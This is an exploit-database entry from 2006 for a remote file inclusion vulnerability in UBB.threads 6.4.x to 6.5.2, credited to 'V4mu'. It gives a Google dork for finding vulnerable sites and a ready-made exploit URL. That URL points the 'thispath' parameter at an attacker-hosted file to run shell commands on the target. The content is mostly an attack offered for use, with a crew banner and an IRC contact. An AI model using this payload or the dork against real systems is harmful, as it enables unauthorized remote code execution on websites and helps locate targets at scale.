UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability

2006-05-22T00:00:00
ID 1337DAY-ID-436
Type zdt
Reporter V4mu
Modified 2006-05-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability
======================================================================



Anomaly 1n The System presents
UBB.threads >= 6.4.x Remote File Inclusion
 
founded by V4mu in 04/20/2006

URL: http://www.ubbcentral.com
Google dork: allinurl:"/ubbthreads/"

exploit:
/addpost_newpoll.php?addpoll=preview&thispath=http://[attacker]/cmd.gif?&cmd=id
 
contact: irc.gigachat.net #A1TS



#  0day.today [2018-01-02]  #